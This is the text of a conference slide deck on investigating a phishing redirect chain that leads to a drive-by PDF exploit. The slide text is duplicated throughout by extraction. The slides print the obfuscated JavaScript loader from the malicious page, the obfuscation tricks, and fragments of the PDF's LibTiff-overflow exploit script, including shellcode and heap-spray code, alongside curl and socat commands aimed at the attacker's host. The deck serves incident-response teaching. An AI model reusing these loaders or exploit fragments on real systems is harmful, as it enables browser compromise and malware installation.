Upload
lee-brotherston
View
173
Download
2
Tags:
Embed Size (px)
DESCRIPTION
Slides to accompany my talk given to TASK.to on 25th Sept 2013. I discuss tracking an attempted
Citation preview
Analyzing Phishing & Analyzing Phishing & Malware Attacks For Malware Attacks For
Neither Fun Nor ProfitNeither Fun Nor Profit
Lee BrotherstonLee Brotherston@leEb_public@leEb_public
Obligatory “where I work” Obligatory “where I work” slideslide
IntroductionIntroduction
• What is meant by Malware & Phishing?What is meant by Malware & Phishing?
• Responding with Malware & Phishing?Responding with Malware & Phishing?
• Case study + bonus tangentsCase study + bonus tangents
• QuestionsQuestions
Malware Response StepsMalware Response StepsDuring:During:
• Assess if attack was successfulAssess if attack was successful
• Assess impact to users/networkAssess impact to users/network
• Contain & RemediateContain & Remediate
Afterwards:Afterwards:
• Examine what workedExamine what worked
• Examine what failedExamine what failed
• Improve processes, procedures & toolsImprove processes, procedures & tools
Anatomy of a phishAnatomy of a phish
Attacker sends
phishing emails
Target (user) clicks on one of the links
Redirects & Obfuscation
Harvest information
Drop Malware
Bad Things!!The “real”
phishing site
Tangent #1 – Stanley Tangent #1 – Stanley MilgramMilgram
Case Study - EmailCase Study - Email
Case Study – OPSECCase Study – OPSEC
• Virtualised Environments (are not a Virtualised Environments (are not a panacea)panacea)
• No, not a real browser….. No.No, not a real browser….. No.
• wget, curl, nslookup, socat & telnet are wget, curl, nslookup, socat & telnet are your friendsyour friends
(--user-agent=“…” is also your friend)(--user-agent=“…” is also your friend)
Case Study - RedirectionCase Study - Redirection
curl --dump-header header.txt curl --dump-header header.txt
--user-agent "Mozilla/4.0 (compatible; MSIE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)“6.0; Windows NT 5.1; SV1)“
hxxp://xn--80ahaobzXXXXXXX.XX--XXXX/hxxp://xn--80ahaobzXXXXXXX.XX--XXXX/
Case Study - RedirectionCase Study - Redirection<html><html><title>Redirecting to ACH details, please <title>Redirecting to ACH details, please wait.....</title>wait.....</title>
<script type="text/javascript"><script type="text/javascript"><!--<!--location.replace("hxxp://location.replace("hxxp://EVILMALWARESITE.COM/ensure/bulletin-EVILMALWARESITE.COM/ensure/bulletin-isolate.php");isolate.php");
//-->//--></script></script><noscript><noscript><meta http-equiv="refresh" content="0; <meta http-equiv="refresh" content="0; url=hxxp://EVILMALWARESITE.COM/ensure/bullurl=hxxp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php">etin-isolate.php">
</noscript></noscript>
Case Study – Case Study – EvilMalwareSite.comEvilMalwareSite.com<body><i></i><b><body><i></i><b>
59,96,111,111,107,100,115,31,118,104,99,115,103,60,33,48,33,31,103,100,104,102,103,115,60,33,48,33,61,59,111,96,113,96,108,3159,96,111,111,107,100,115,31,118,104,99,115,103,60,33,48,33,31,103,100,104,102,103,115,60,33,48,33,61,59,111,96,113,96,108,31,109,96,108,100,60,33,105,109,107,111,94,103,113,100,101,33,31,117,96,107,116,100,60,33,103,115,115,111,57,46,46,102,116,109,96,108,100,60,33,105,109,107,111,94,103,113,100,101,33,31,117,96,107,116,100,60,33,103,115,115,111,57,46,46,102,116,107,107,104,117,100,113,106,104,99,114,45,98,110,108,46,100,109,114,116,113,100,46,97,116,107,107,100,115,104,109,44,10,107,107,104,117,100,113,106,104,99,114,45,98,110,108,46,100,109,114,116,113,100,46,97,116,107,107,100,115,104,109,44,104,114,110,107,96,115,100,45,111,103,111,62,105,109,107,111,60,54,99,101,101,50,98,49,100,49,49,33,46,61,59,79,64,81,64,74,114,110,107,96,115,100,45,111,103,111,62,105,109,107,111,60,54,99,101,101,50,98,49,100,49,49,33,46,61,59,79,64,81,64,76,31,109,96,108,100,60,33,105,109,107,111,94,100,108,97,100,99,99,100,99,33,31,117,96,107,116,100,60,33,79,67,56,51,97,86,31,109,96,108,100,60,33,105,109,107,111,94,100,108,97,100,99,99,100,99,33,31,117,96,107,116,100,60,33,79,67,56,51,97,86,118,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,118,72,104,65,107,97,108,77,117,89,70,107,116,89,121,47,1046,118,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,118,72,104,65,107,97,108,77,117,89,70,107,116,89,121,47,104,99,87,81,108,75,83,102,104,79,121,51,102,67,80,110,55,96,108,52,114,98,66,65,121,98,70,85,105,79,82,72,119,75,105,64,10,99,87,81,108,75,83,102,104,79,121,51,102,67,80,110,55,96,108,52,114,98,66,65,121,98,70,85,105,79,82,72,119,75,105,64,104,72,71,103,115,97,70,52,121,78,108,111,108,100,67,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,69,108,100,66,54,72,71,103,115,97,70,52,121,78,108,111,108,100,67,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,69,108,100,66,52,105,97,49,47,104,79,104,64,77,66,105,119,111,97,108,89,117,98,108,48,103,99,70,107,117,97,105,51,102,67,80,110,55,99,72,105,97,49,47,104,79,104,64,77,66,105,119,111,97,108,89,117,98,108,48,103,99,70,107,117,97,105,51,102,67,80,110,55,99,70,107,47,97,70,84,42,82,106,52,76,84,67,118,117,99,70,107,47,97,70,84,42,72,64,47,74,79,71,89,107,97,108,81,117,98,105,50,107,47,97,70,84,42,82,106,52,76,84,67,118,117,99,70,107,47,97,70,84,42,72,64,47,74,79,71,89,107,97,108,81,117,98,105,52,74,83,106,119,80,79,66,56,49,89,86,52,106,97,50,72,42,72,64,47,74,79,70,81,107,98,49,77,120,96,87,65,47,96,86,56,116,72,74,83,106,119,80,79,66,56,49,89,86,52,106,97,50,72,42,72,64,47,74,79,70,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,106,111,78,83,69,64,55,75,49,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,104,64,77,66,105,119,117,89,108,89,114,969,106,111,78,83,69,64,55,75,49,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,104,64,77,66,105,119,117,89,108,89,114,96,86,52,107,75,86,69,114,97,70,56,50,89,86,80,117,79,104,64,77,66,105,118,117,96,86,52,108,97,50,73,115,88,87,81,111,97,4,86,52,107,75,86,69,114,97,70,56,50,89,86,80,117,79,104,64,77,66,105,118,117,96,86,52,108,97,50,73,115,88,87,81,111,97,49,51,42,72,64,47,74,79,71,73,107,98,49,56,48,98,108,77,107,98,121,51,102,67,80,110,73,79,70,110,120,98,49,84,102,99,108,9,51,42,72,64,47,74,79,71,73,107,98,49,56,48,98,108,77,107,98,121,51,102,67,80,110,73,79,70,110,120,98,49,84,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,49,74,120,72,102,96,71,73,107,89,105,47,104,96,71,81,47,98,67,110,117,75,49,85,120,98,49,107,117,97,105,47,104,76,82,51,49,74,120,72,102,96,71,73,107,89,105,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,68,116,98,50,85,116,75,108,77,117,97,82,56,118,98,108,56,106,99,86,77,47,98,120,56,103,99,87,81,117,89,70111,103,99,108,68,116,98,50,85,116,75,108,77,117,97,82,56,118,98,108,56,106,99,86,77,47,98,120,56,103,99,87,81,117,89,70,118,117,96,105,73,121,89,82,72,117,79,104,64,77,66,102,106,55,96,108,69,120,72,70,103,120,89,86,88,56,72,104,56,107,97,,118,117,96,105,73,121,89,82,72,117,79,104,64,77,66,102,106,55,96,108,69,120,72,70,103,120,89,86,88,56,72,104,56,107,97,109,77,48,98,108,84,117,88,109,85,114,97,70,85,47,96,86,51,115,96,87,77,117,97,70,69,47,89,82,52,118,96,71,64,46,99,87,7109,77,48,98,108,84,117,88,109,85,114,97,70,85,47,96,86,51,115,96,87,77,117,97,70,69,47,89,82,52,118,96,71,64,46,99,87,77,103,79,86,77,106,96,87,69,108,88,109,72,108,99,108,69,49,79,86,89,106,89,71,77,114,98,71,103,111,72,104,65,115,88,86,17,103,79,86,77,106,96,87,69,108,88,109,72,108,99,108,69,49,79,86,89,106,89,71,77,114,98,71,103,111,72,104,65,115,88,86,107,116,79,82,73,47,98,109,85,107,72,104,55,42,72,64,47,74,79,66,56,120,89,87,77,117,99,87,73,105,89,87,76,42,72,64,47,7407,116,79,82,73,47,98,109,85,107,72,104,55,42,72,64,47,74,79,66,56,120,89,87,77,117,99,87,73,105,89,87,76,42,72,64,47,74,79,70,69,118,98,70,119,107,99,66,48,106,89,87,77,105,72,70,52,103,97,86,84,56,72,106,81,107,97,86,55,102,80,87,65,118,9,79,70,69,118,98,70,119,107,99,66,48,106,89,87,77,105,72,70,52,103,97,86,84,56,72,106,81,107,97,86,55,102,80,87,65,118,97,70,85,47,72,104,65,115,88,86,107,116,75,86,77,114,88,87,77,121,79,82,73,50,96,66,72,102,99,49,107,106,99,70,102,56,72,7,70,85,47,72,104,65,115,88,86,107,116,75,86,77,114,88,87,77,121,79,82,73,50,96,66,72,102,99,49,107,106,99,70,102,56,72,105,68,104,72,70,103,107,96,86,99,110,99,67,47,104,76,82,72,42,67,80,110,102,79,71,65,103,98,108,69,115,72,70,52,103,97,105,68,104,72,70,103,107,96,86,99,110,99,67,47,104,76,82,72,42,67,80,110,102,79,71,65,103,98,108,69,115,72,70,52,103,97,86,84,56,72,107,56,101,88,87,65,118,97,70,85,47,87,50,77,121,99,107,56,49,88,86,119,111,89,70,69,47,89,86,80,104,72,71,886,84,56,72,107,56,101,88,87,65,118,97,70,85,47,87,50,77,121,99,107,56,49,88,86,119,111,89,70,69,47,89,86,80,104,72,71,89,103,97,71,85,107,79,82,73,47,98,109,85,107,72,105,51,55,75,50,65,103,98,108,69,115,79,104,64,77,66,104,64,55,98,70,69,9,103,97,71,85,107,79,82,73,47,98,109,85,107,72,105,51,55,75,50,65,103,98,108,69,115,79,104,64,77,66,104,64,55,98,70,69,120,88,86,47,102,97,108,69,115,89,83,47,104,99,108,69,114,72,104,65,49,88,86,119,48,89,83,47,104,81,71,107,52,76,47,56,1120,88,86,47,102,97,108,69,115,89,83,47,104,99,108,69,114,72,104,65,49,88,86,119,48,89,83,47,104,81,71,107,52,76,47,56,112,96,106,69,75,75,82,47,51,99,108,85,114,98,83,103,77,96,87,98,107,99,67,65,112,89,86,56,111,82,49,119,107,96,105,56,7512,96,106,69,75,75,82,47,51,99,108,85,114,98,83,103,77,96,87,98,107,99,67,65,112,89,86,56,111,82,49,119,107,96,105,56,75,75,82,48,107,100,83,103,117,72,105,51,55,75,50,65,103,98,108,69,115,79,102,47,74,72,67,119,118,88,87,73,103,97,82,65,11,75,82,48,107,100,83,103,117,72,105,51,55,75,50,65,103,98,108,69,115,79,102,47,74,72,67,119,118,88,87,73,103,97,82,65,116,88,86,48,107,79,82,73,118,98,108,107,115,89,82,72,102,99,108,69,114,99,86,84,56,72,108,47,51,96,87,80,115,85,109,107,16,88,86,48,107,79,82,73,118,98,108,107,115,89,82,72,102,99,108,69,114,99,86,84,56,72,108,47,51,96,87,80,115,85,109,107,107,99,121,77,68,76,50,103,49,75,108,72,49,75,84,55,49,80,84,56,110,87,47,55,119,89,106,55,119,76,85,73,65,89,86,72,49,7607,99,121,77,68,76,50,103,49,75,108,72,49,75,84,55,49,80,84,56,110,87,47,55,119,89,106,55,119,76,85,73,65,89,86,72,49,76,68,55,119,77,106,55,119,76,84,55,119,76,84,55,49,78,68,55,119,89,106,55,49,81,68,55,119,96,68,55,49,81,68,55,49,81,69,7,68,55,119,77,106,55,119,76,84,55,119,76,84,55,49,78,68,55,119,89,106,55,49,81,68,55,119,96,68,55,49,81,68,55,49,81,69,73,52,88,105,88,116,84,105,76,118,88,107,77,82,98,85,56,104,76,120,72,42,79,66,56,118,88,87,73,103,97,83,51,77,66,105,1183,52,88,105,88,116,84,105,76,118,88,107,77,82,98,85,56,104,76,120,72,42,79,66,56,118,88,87,73,103,97,83,51,77,66,105,118,117,88,87,65,118,97,70,85,47,75,86,81,107,98,49,76,42,72,64,47,74,79,71,85,118,89,70,69,47,89,82,65,105,96,70,85,105,96,117,88,87,65,118,97,70,85,47,75,86,81,107,98,49,76,42,72,64,47,74,79,71,85,118,89,70,69,47,89,82,65,105,96,70,85,105,96,121,47,104,88,108,69,105,96,49,99,120,97,50,85,116,89,66,72,117,79,102,47,74,79,66,56,112,97,108,119,118,79,102,60,60,3,121,47,104,88,108,69,105,96,49,99,120,97,50,85,116,89,66,72,117,79,102,47,74,79,66,56,112,97,108,119,118,79,102,60,60,33,46,61,59,111,96,113,96,108,31,109,96,108,100,60,33,111,113,104,108,100,33,31,117,96,107,116,100,60,33,108,55,104,115,43,46,61,59,111,96,113,96,108,31,109,96,108,100,60,33,111,113,104,108,100,33,31,117,96,107,116,100,60,33,108,55,104,115,44,85,120,100,118,50,67,50,119,117,45,97,53,44,78,53,64,78,103,94,78,48,101,78,48,48,81,64,100,97,53,47,78,48,53,78,48,484,85,120,100,118,50,67,50,119,117,45,97,53,44,78,53,64,78,103,94,78,48,101,78,48,48,81,64,100,97,53,47,78,48,53,78,48,48,78,48,48,78,53,55,78,48,101,78,53,67,78,48,103,78,53,67,78,53,67,81,120,97,53,45,81,50,47,97,82,81,112,94,97,50,33,61,5,78,48,48,78,53,55,78,48,101,78,53,67,78,48,103,78,53,67,78,53,67,81,120,97,53,45,81,50,47,97,82,81,112,94,97,50,33,61,59,46,111,96,113,96,108,61,59,111,96,113,96,108,31,117,96,107,116,100,60,33,67,120,120,50,78,105,105,64,74,44,44,55,117,19,46,111,96,113,96,108,61,59,111,96,113,96,108,31,117,96,107,116,100,60,33,67,120,120,50,78,105,105,64,74,44,44,55,117,100,107,112,55,76,104,118,36,115,47,105,100,110,104,74,107,100,105,62,74,44,44,100,120,55,110,33,31,109,96,108,100,60,33,00,107,112,55,76,104,118,36,115,47,105,100,110,104,74,107,100,105,62,74,44,44,100,120,55,110,33,31,109,96,108,100,60,33,37,34,47,47,48,48,55,58,96,107,33,46,61,59,46,96,111,111,107,100,115,6137,34,47,47,48,48,55,58,96,107,33,46,61,59,46,96,111,111,107,100,115,61
</b></b>
<script><script>try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"]try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"]
(",");for(j=0;a["length"]>j;j++)(",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].ap{a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}pendChild(d);d["innerHTML"]=a;}
Tangent #2 - ObfuscationTangent #2 - Obfuscation
<script><script>document.write('Hello World');document.write('Hello World');
</script></script>
Tangent #2 - ObfuscationTangent #2 - Obfuscation
<script><script>document.write('Heldocument.write('Hel'+''+'lo Wolo Wo'+''+'rld');rld');
</script></script>
Tangent #2 - ObfuscationTangent #2 - Obfuscation
<script><script>var naughty =var naughty =
"document.write('Hel'+'lo Wo'+'rld');";"document.write('Hel'+'lo Wo'+'rld');";eval(naughty);eval(naughty);
</script></script>
Tangent #2 - ObfuscationTangent #2 - Obfuscation
<script><script>var encodedNaughty =var encodedNaughty =
"646f63756d656e742e7772697465282748656c272b276c6f205"646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";76f272b27726c6427293b";
var naughty ='';var naughty ='';
for (var i = 0; i < encodedNaughty.length; i += 2)for (var i = 0; i < encodedNaughty.length; i += 2)naughty += naughty +=
String.fromCharCode(parseInt(encodedNaughty.substr(iString.fromCharCode(parseInt(encodedNaughty.substr(i, 2), 16));, 2), 16));
eval(naughty);eval(naughty);</script></script>
Tangent #2 - ObfuscationTangent #2 - Obfuscation
<script><script>varvar aa = = "646f63756d656e742e7772697465282748656c272b276c6f205"646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";76f272b27726c6427293b";
varvar aaaa ='';='';
for (varfor (var aaaaaa = 0;= 0; aaaaaa << aa.length;.length; aaaaaa += 2) += 2)aa += aa +=
String.fromCharCode(parseInt(String.fromCharCode(parseInt(aa.substr(.substr(aaaaaa, 2), 16));, 2), 16));
eval(eval(aaaa););</script></script>
Tangent #2 - ObfuscationTangent #2 - Obfuscation
<script><script>var a = var a =
"646f63756d656e742e7772697465282748656c272b276c6f2"646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";0576f272b27726c6427293b";
z=eval;z=eval;
var aa ='';var aa ='';
for (var aaa = 0; aaa < a.length; aaa += 2)for (var aaa = 0; aaa < a.length; aaa += 2)aa += String.fromCharCode(parseInt(a.substr(aaa, aa += String.fromCharCode(parseInt(a.substr(aaa, 2), 16));2), 16));
z(aa);z(aa);</script></script>
Tangent #2 - ObfuscationTangent #2 - Obfuscation
<script>var <script>var a="646f63756d656e742e7772697465282748656c272b276c6f2a="646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";z=eval;var aa='';for (var 0576f272b27726c6427293b";z=eval;var aa='';for (var aaa=0;aaa<a.length;aaa+= aaa=0;aaa<a.length;aaa+= 2)aa+=String.fromCharCode(parseInt(a.substr(aaa,2),12)aa+=String.fromCharCode(parseInt(a.substr(aaa,2),16));z(aa);</script>6));z(aa);</script>
====
<script><script>document.write('Hello World');document.write('Hello World');
</script></script>
Deobfuscating Example - Deobfuscating Example - ReveloRevelo
Deobfuscating GK - ReveloDeobfuscating GK - Revelo
What What Happened?Happened?
Case StudyCase Study<script><script>try{document.body--}catch(dv32r3)try{document.body--}catch(dv32r3)
{a=document[("getEl"+"ementsByTagName")]("b"){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++)[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(Strin{a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChg,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}ild(d);d["innerHTML"]=a;}
</script></script>
<script><script>z=eval;ss=String;function vq(){for(i=0;i<a.length;i++)z=eval;ss=String;function vq(){for(i=0;i<a.length;i++)
{if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz(){if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz(){dd=document;try{dd.body-=12}catch(xq){a=dd[gg]{dd=document;try{dd.body-=12}catch(xq){a=dd[gg]("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function ("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));}zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));}
</script></script>
<script><script>s="";s="";zzz();zzz();az=1;try{caewbtew=~2;}catch(vava){az=0;}az=1;try{caewbtew=~2;}catch(vava){az=0;}vq();vq();u=z;uu=s;u=z;uu=s;if(az)u(uu);if(az)u(uu);</script></script>
Case StudyCase Study<script><script> try {try { document.body--document.body-- } catch (dv32r3) {} catch (dv32r3) { a = documenta = document[("getEl" + "ementsByTagName")][("getEl" + "ementsByTagName")]("b")("b")
[0].innerHTML["split"](",");[0].innerHTML["split"](","); for (j = 0; a["length"] > j; j++) {for (j = 0; a["length"] > j; j++) { a[j] = 1 + 0x1 * a[j];a[j] = 1 + 0x1 * a[j]; }} ff = "f";ff = "f"; a = String[ff + "romCharCode"a = String[ff + "romCharCode"].apply(String, a);].apply(String, a); d = document.createElement("span");d = document.createElement("span"); document["body"].appendChild(d);document["body"].appendChild(d); d["innerHTML"] = a;d["innerHTML"] = a; }}
z = eval;z = eval; ss = String;ss = String;
function vq() {function vq() { . . . . . . . . . . . . . . . . . .
Case Study – Quick & Dirty Case Study – Quick & Dirty Deobfuscate…Deobfuscate…
z = eval;z = eval;
u = z;u = z;
if (az) u(uu);if (az) u(uu);
u = eval uu = decoded scriptu = eval uu = decoded script
if(az) if(az) document.write('<code>'+document.write('<code>'+uuuu+'</code>'+'</code>'););
Et Voila!Et Voila!pdpd={version:"0.7.9",name:"pdpd",pdpd={version:"0.7.9",name:"pdpd",handler:function(c,b,a){return handler:function(c,b,a){return function()function(){c(b,a)}},openTag:"<",isDefined:{c(b,a)}},openTag:"<",isDefined:function(b){return typeof b!function(b){return typeof b!="undefined"},isArray:function(b="undefined"},isArray:function(b){return(/array/i).test(Object.p){return(/array/i).test(Object.prototype.toString.call(b))},isFurototype.toString.call(b))},isFunc:function(b)nc:function(b)
. . . . . .. . . . . .
Edited HighlightsEdited Highlightsflash: {flash: { mimeType: "application/x-shockwave-mimeType: "application/x-shockwave-flash",flash",
progID: "ShockwaveFlash.ShockwaveFlash",progID: "ShockwaveFlash.ShockwaveFlash", classID: "clsid:D27CDB6E-AE6D-11CF-96B8-classID: "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",444553540000",
getVersion: function () {getVersion: function () {
adobereader: {adobereader: { mimeType: "application/pdf",mimeType: "application/pdf",
java: {java: { mimeType: ["application/x-java-mimeType: ["application/x-java-applet", "application/x-java-vm", applet", "application/x-java-vm", "application/x-java-bean"],"application/x-java-bean"],
Socat - the quick (cheats) Socat - the quick (cheats) wayway
$ socat TCP4-LISTEN:8080 –$ socat TCP4-LISTEN:8080 –
GET GET http://EVILMALWARESITE.COM/ensure/bulletinhttp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php?jnlp=7dff3c2e22-isolate.php?jnlp=7dff3c2e22 HTTP/1.1 HTTP/1.1
accept-encoding: gzipaccept-encoding: gzipHost: evilmalwaresite.comHost: evilmalwaresite.comCache-Control: no-cacheCache-Control: no-cachePragma: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (Windows XP 5.1) User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_21Java/1.6.0_21
Accept: text/html, image/gif, image/jpeg, *; Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2q=.2, */*; q=.2
Proxy-Connection: keep-aliveProxy-Connection: keep-alive
Case Study – Summary so Case Study – Summary so farfar
• RedirectsRedirects
• Obtains obfuscated scriptObtains obfuscated script
• De-obfuscates scriptDe-obfuscates script
• Profiles the browser (which browser, Profiles the browser (which browser, ActiveX, Flash, Java, MediaPlayer plugins, ActiveX, Flash, Java, MediaPlayer plugins, Acrobat Reader, etc)Acrobat Reader, etc)
• Collects versions & configuration of the Collects versions & configuration of the pluginsplugins
• Rewrites the current pageRewrites the current page
• Embeds the payload (PDF)Embeds the payload (PDF)
Case Study – AntiVirusCase Study – AntiVirus
Case Study – PayloadCase Study – Payload
• VirusTotalVirusTotal–LibTiff Integer OverflowLibTiff Integer Overflow–PDF:Exploit.PDF-JS.AAHPDF:Exploit.PDF-JS.AAH–PDF/Blacole-FHJ!811825B7A717PDF/Blacole-FHJ!811825B7A717–Exploit:Win32/CVE-2010-0188Exploit:Win32/CVE-2010-0188
Case Study – PayloadCase Study – Payload
• Malware Tracker:Malware Tracker:– 111.0@4334: suspicious.javascript in XFA 111.0@4334: suspicious.javascript in XFA
blockblock
– 111.0@4334: suspicious.warning: object 111.0@4334: suspicious.warning: object contains JavaScriptcontains JavaScript
• Let’s extract the XFA blockLet’s extract the XFA block
MalwareScanner - XFAMalwareScanner - XFA
XFA Block – here we go XFA Block – here we go again!again!
<script contentType='application/x-<script contentType='application/x-javascript'>javascript'>
if(this.execInitialize()===null)if(ImageFielif(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0)d1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event.target;}{x='eI';zz="y";z=event.target;}
xs="\x65";xs="\x65";
dd="Co"+"de";dd="Co"+"de";
ddd="ar";ddd="ar";
s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";
xx=s[2].concat('a',"l");xx=s[2].concat('a',"l");
XFA Block - ObfuscationXFA Block - Obfuscation
s=caca="ntvs=caca="ntvttdhfePJxTmlNo#hFpx!ZeA*yvv#@";dhfePJxTmlNo#hFpx!ZeA*yvv#@";
String["fr"['cString["fr"['c'+''+'oo'+"'+"nca"+s[3]]…nca"+s[3]]…
String["fr"['conca'+String["fr"['conca'+s[3]]s[3]]……
String["fr"['concat']…String["fr"['concat']…
XFA Block – ObfuscationXFA Block – Obfuscation
function ZZA(){return 2-function ZZA(){return 2-2;}2;}
sq=z[xs+xx]sq=z[xs+xx]xs="\x65"; xs="\x65"; xx=s[2].concat('a',"l");xx=s[2].concat('a',"l");
sq=eval;sq=eval;
Hex “e”Hex “e”
s[2] = “v”s[2] = “v”
XFA Block - ObfuscationXFA Block - Obfuscation
if(this.execInitialize()===null)if(ImageFielif(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0)d1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event.target;}{x='eI';zz="y";z=event.target;}
====
if(1){x='eI';zz="y";z=event.target;}if(1){x='eI';zz="y";z=event.target;}
OrOr
if(0){x='eI';zz="y";z=event.target;}if(0){x='eI';zz="y";z=event.target;}
XFA Block – Just Won’t RunXFA Block – Just Won’t Run
z=event.target; <- Makes IE Barf
. == .
z=event.target;
XFA Block - ObfuscationXFA Block - Obfuscation
a=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZAa=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZA(('2'),00),ZA(('7'),00),ZA(('6'),01),ZA(('(('2'),00),ZA(('7'),00),ZA(('6'),01),ZA(('6'),04),ZA(('6'),04),ZA(('6'),011)6'),04),ZA(('6'),04),ZA(('6'),011)…………
function ZA(a,b) {function ZA(a,b) {
a+=b;a+=b;
sq=z[xs+xx]("\x70ar"+"s"+x+s[0]+s[1]);sq=z[xs+xx]("\x70ar"+"s"+x+s[0]+s[1]);
return sq(a,16);return sq(a,16);
}}
Let’s try some guessworkLet’s try some guessworkfunction ZA(a,b){function ZA(a,b){
a+=b;a+=b;document.write(String.fromCharCode(parseInt(a, 16)));document.write(String.fromCharCode(parseInt(a, 16)));
}}
ZA(('7'),06)ZA(('7'),06)ZA(('6'),01)ZA(('6'),01)ZA(('7'),02)ZA(('7'),02)ZA(('2'),00)ZA(('2'),00)ZA(('7'),00)ZA(('7'),00)ZA(('6'),01)ZA(('6'),01)ZA(('6'),04)ZA(('6'),04)ZA(('6'),04)ZA(('6'),04)ZA((‘6’),011)ZA((‘6’),011)ZA((‘6’),E)ZA((‘6’),E)ZA((‘6’),7)ZA((‘6’),7)
Hex 76 == ‘v’Hex 76 == ‘v’Hex 61 == ‘a’Hex 61 == ‘a’Hex 72 == ‘r’Hex 72 == ‘r’Hex 20 == SpaceHex 20 == SpaceHex 70 == ‘p’Hex 70 == ‘p’Hex 61 == ‘a’Hex 61 == ‘a’Hex 64 == ‘d’Hex 64 == ‘d’Hex 64 == ‘d’Hex 64 == ‘d’????????Hex 6E == ‘n’Hex 6E == ‘n’Hex 67 == ‘g’Hex 67 == ‘g’
‘‘i’ == Hex 69i’ == Hex 69Octal 011 == Hex 9Octal 011 == Hex 9
That seemed to work! That seemed to work! (mostly)(mostly)
var padding;var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var pointers_a, i;var x = new Array();var x = new Array();var y = new Array();var y = new Array();var _l1 = var _l1 =
"4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a414141"4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141441260000000000000000000000000000001239804a6420600f000400004141414141414141" + ".split('').reverse().join('').replace(/;/g, 14141414141" + ".split('').reverse().join('').replace(/;/g, '');'');
_l3 = app;_l3 = app;_l4 = new Array();_l4 = new Array();
function _l5() {function _l5() { var _l6 = _l3.viewerVersion.toString();var _l6 = _l3.viewerVersion.toString(); _l6 = _l6.replace('.', '');_l6 = _l6.replace('.', ''); while (_l6.length < 4) _l6 += '0';while (_l6.length < 4) _l6 += '0'; return parseInt(_l6, 10)return parseInt(_l6, 10)}}
function _l7(_l8, _l9) {function _l7(_l8, _l9) { while (_l8.length * 2 < _l9) _l8 += _l8;while (_l8.length * 2 < _l9) _l8 += _l8; return _l8.substring(0, _l9 / 2)return _l8.substring(0, _l9 / 2)……..
Exploit Code – ObservationsExploit Code – Observations
• No real obfuscation
• No fake functions, variables or other distractions.
• Nearly all string manipulation.
Exploit - SamplesExploit - Samples
var padding;
var pointers_a, i;
loxWhee = _I1 + spray;
ImageField1.rawValue = _ll1
Case Study – PayloadCase Study – Payload
• Uses a LibTiff OverflowUses a LibTiff Overflow
• Executes arbitrary code, which…Executes arbitrary code, which…
• Downloads an executes .dll of attackers Downloads an executes .dll of attackers choice…choice…
Game OverGame Over
Tangent #3 – Game Over?Tangent #3 – Game Over?
Source: XKCD
Case Study – 2 weeks Case Study – 2 weeks later…later…
A breach timelineA breach timeline
Source: Verizon 2013 Data Breach Information Report
Is this isolated?Is this isolated?
But do people actually click?But do people actually click?
Source: Verizon 2013 Data Breach Information ReportSource: Verizon 2013 Data Breach Information Report
The “best” PhishThe “best” Phish
ResourcesResources
Socat: http://www.dest-unreach.org/socat/
VirusTotal: http://www.virustotal.com/
Revolo: http://www.kahusecurity.com/
Malzilla: http://malzilla.sourceforge.net/
curl/wget: Your local package management tool Malware Tracker: http://malwaretracker.com/
Javascript Beautifier: http://jsbeautifier.org/
Javascript Unpack: http://jsunpack.jeek.org DBIR: http://www.verizonenterprise.com/DBIR/2013/
Thank you for your time.Thank you for your time.
Any Questions?Any Questions?